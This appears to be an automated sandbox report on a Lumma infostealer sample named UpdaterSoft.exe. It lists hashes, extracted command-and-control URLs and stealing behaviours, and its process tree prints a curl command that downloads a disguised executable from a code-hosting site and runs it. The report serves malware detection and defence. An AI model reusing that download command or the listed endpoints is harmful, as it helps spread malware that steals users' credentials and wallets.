Overview
overview
10Static
static
3UpdaterSoft.exe
windows7-x64
1UpdaterSoft.exe
windows10-2004-x64
10locales/wi...01.exe
windows7-x64
5locales/wi...01.exe
windows10-2004-x64
1python3.dll
windows7-x64
1python3.dll
windows10-2004-x64
1python312.dll
windows7-x64
3python312.dll
windows10-2004-x64
3updater/py...64.exe
windows7-x64
7updater/py...64.exe
windows10-2004-x64
7vcruntime140.dll
windows7-x64
3vcruntime140.dll
windows10-2004-x64
3Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-12-2024 03:35
Static task
static1
Behavioral task
behavioral1
Sample
UpdaterSoft.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
UpdaterSoft.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
locales/winrar-x64-701.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
locales/winrar-x64-701.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
python3.dll
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
python3.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
python312.dll
Resource
win7-20241023-en
Behavioral task
behavioral8
Sample
python312.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
updater/python-3.13.1-amd64.exe
Resource
win7-20240729-en
Behavioral task
behavioral10
Sample
updater/python-3.13.1-amd64.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
vcruntime140.dll
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
vcruntime140.dll
Resource
win10v2004-20241007-en
General
-
Target
UpdaterSoft.exe
-
Size
100KB
-
MD5
cd2b6c28a8690c90953625c38ad21c05
-
SHA1
cc9f6d12be5f2ee6001af0a6d7399619bb2ea721
-
SHA256
1ecd4b2fc4c5ba45e58005df147b1f8cf51db8fabe1be76fb2ece1e55d42c4ff
-
SHA512
8c54b0e9baba8be6105072e36aa2b02672a29c5ed138c5de306a55468c2ead66afe786a88719e0404cada45e1bbf0cf4f4ca24acb98f84b99ded31a09b9f8152
-
SSDEEP
1536:kE/hIxHHWMpdPa5wiE21M8kJIGFvb1CwL/L5syuyUzR9aBfI+v3GVm:3SwMpdCq/IM8uIGfh/L5sNFVm
Malware Config
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
https://ingreem-eilish.biz/api
Extracted
lumma
https://ingreem-eilish.biz/api
Signatures
-
Lumma family
-
Executes dropped EXE 1 IoCs
pid Process 3348 MicrosoftOpenBoard240647828.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UpdaterSoft.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftOpenBoard240647828.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3348 MicrosoftOpenBoard240647828.exe 3348 MicrosoftOpenBoard240647828.exe 3348 MicrosoftOpenBoard240647828.exe 3348 MicrosoftOpenBoard240647828.exe 3348 MicrosoftOpenBoard240647828.exe 3348 MicrosoftOpenBoard240647828.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4552 wrote to memory of 4908 4552 UpdaterSoft.exe 83 PID 4552 wrote to memory of 4908 4552 UpdaterSoft.exe 83 PID 4552 wrote to memory of 4908 4552 UpdaterSoft.exe 83 PID 4552 wrote to memory of 3348 4552 UpdaterSoft.exe 102 PID 4552 wrote to memory of 3348 4552 UpdaterSoft.exe 102 PID 4552 wrote to memory of 3348 4552 UpdaterSoft.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\UpdaterSoft.exe"C:\Users\Admin\AppData\Local\Temp\UpdaterSoft.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\SysWOW64\curl.execurl -o "C:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240647828.exe" "https://codeberg.org/whoachek/33333/raw/branch/main/1/vqafmixmmr.png" -H "User-Agent: Mozilla/5.0" -H "Accept: */*"2⤵
- System Location Discovery: System Language Discovery
PID:4908
-
-
C:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240647828.exeC:\Users\Admin\AppData\Roaming\MicrosoftOpenBoard240647828.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3348
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5f1c31db067049938dd0de6ebcecccbff
SHA195def6211ec6e9355fee6141dec60077e6ab2daf
SHA2563f9a251541dd3516a0a75a3591733c3cd76207e09bc3ef9e7d0ae2b9d00b0288
SHA5126c0aea6d5b20b17f02df92ca55a57499b1f1d27e7ba0f99c4ab39ffe9fa83de4a01b008cb78dd4ff0555848bf9ece56c989c4267bd4ccff3cd7b9d604701e3ea
-
Filesize
1.9MB
MD5256a1ccec403335433630f6824e081df
SHA188abf0221a21e688971e4f746f802d86a86fe085
SHA256f99595da2c8aca38f9749dc0b36d5203e2d51769db297aaa45bcb1eea27cec5d
SHA51256bef26930b9c4d7e3e9388fc9abb916f012dc2a643927eb8047527ce337d39e99d76f5613722e4458959fd130d47e954992f3b106c81007d69e8c48203612e0